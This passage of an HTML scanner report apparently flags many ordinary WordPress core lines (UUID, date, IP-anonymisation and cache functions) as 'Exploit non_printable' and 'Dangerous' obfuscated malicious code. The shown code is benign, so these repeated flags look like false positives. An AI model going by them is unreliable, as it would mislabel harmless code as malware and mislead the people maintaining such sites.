<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_delete_file_from_directory</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$directory </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 774</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Post title</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_delete_file</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7762</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_post_preview_js</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xmlrpc_getposttitle</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7775</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; } );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7797</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">the output does not conform to RFC3339 format</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Date formatted </span><span style="color: #007700">for </span><span style="color: #0000BB">ISO8601 without time zone</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mysql_to_rfc3339</span><span style="color: #007700">( </span><span style="color: #0000BB">$date_string </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7806</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mysql2date</span><span style="color: #007700">( </span><span style="color: #DD0000">'Y-m-d\TH:i:s'</span><span style="color: #007700">, </span><span style="color: #0000BB">$date_string</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7816</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is called</span><span style="color: #007700">. </span><span style="color: #0000BB">Accepts either </span><span style="color: #DD0000">'admin'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7820</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false The limit that was set </span><span style="color: #007700">or </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7822</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_raise_memory_limit</span><span style="color: #007700">( </span><span style="color: #0000BB">$context </span><span style="color: #007700">= </span><span style="color: #DD0000">'admin' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$post_title</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function. </span><span style="color: #0000BB">This allows </span><span style="color: #007700">for </span><span style="color: #0000BB">plugins to define</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 790</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type then would be what $post_default_category</span><span style="color: #007700">. If </span><span style="color: #0000BB">the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7916</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filtered_limit</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_max_limit</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7936</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string UUID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_generate_uuid4</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool The string is a valid UUID </span><span style="color: #007700">or </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_uuid</span><span style="color: #007700">( </span><span style="color: #0000BB">$uuid</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">, </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Only UUID V4 is supported at this time.' </span><span style="color: #007700">), </span><span style="color: #DD0000">'4.9.0' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7978</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">( </span><span style="color: #0000BB">$regex</span><span style="color: #007700">, </span><span style="color: #0000BB">$uuid </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7986</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned value is not universally unique</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 798</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array List </span><span style="color: #0000BB">of categories </span><span style="color: #007700">or </span><span style="color: #0000BB">category name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7991</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned ID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7992</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Unique ID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7994</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unique_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. (string) ++</span><span style="color: #0000BB">$id_counter</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xmlrpc_getpostcategory</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned ID</span><span style="color: #007700">. Default empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Incremental ID per prefix</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8013</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unique_prefixed_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8030</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. (string) </span><span style="color: #0000BB">$id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8039</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string UNIX timestamp with microseconds representing when the group was last changed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_cache_get_last_changed</span><span style="color: #007700">( </span><span style="color: #0000BB">$group </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$last_changed</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_cache_set_last_changed</span><span style="color: #007700">( </span><span style="color: #0000BB">$group </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string UNIX timestamp when the group was last changed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_cache_set_last_changed</span><span style="color: #007700">( </span><span style="color: #0000BB">$group </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8079</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$post_category</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_site_admin_email_change_notification</span><span style="color: #007700">( </span><span style="color: #0000BB">$old_email</span><span style="color: #007700">, </span><span style="color: #0000BB">$new_email</span><span style="color: #007700">, </span><span style="color: #0000BB">$option_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string XMLRPC XML Request content without title </span><span style="color: #007700">and </span><span style="color: #0000BB">category elements</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an anonymized IPv4 </span><span style="color: #007700">or </span><span style="color: #0000BB">IPv6 address</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the original IPv6 address </span><span style="color: #007700">if </span><span style="color: #0000BB">the needed functions</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return `</span><span style="color: #DD0000">::</span><span style="color: #007700">` (</span><span style="color: #0000BB">unspecified address</span><span style="color: #007700">).</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The anonymized IP address</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_privacy_anonymize_ip</span><span style="color: #007700">( </span><span style="color: #0000BB">$ip_addr</span><span style="color: #007700">, </span><span style="color: #0000BB">$ipv6_fallback </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'0.0.0.0'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 819</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xmlrpc_removepostdata</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">? </span><span style="color: #0000BB">time</span><span style="color: #007700">() : </span><span style="color: #0000BB">time</span><span style="color: #007700">() + (int) ( (float) </span><span style="color: #0000BB">get_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'gmt_offset' </span><span style="color: #007700">) * </span><span style="color: #0000BB">HOUR_IN_SECONDS </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'::'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'inet_pton' </span><span style="color: #007700">) && </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'inet_ntop' </span><span style="color: #007700">) ) {</span>
</span>
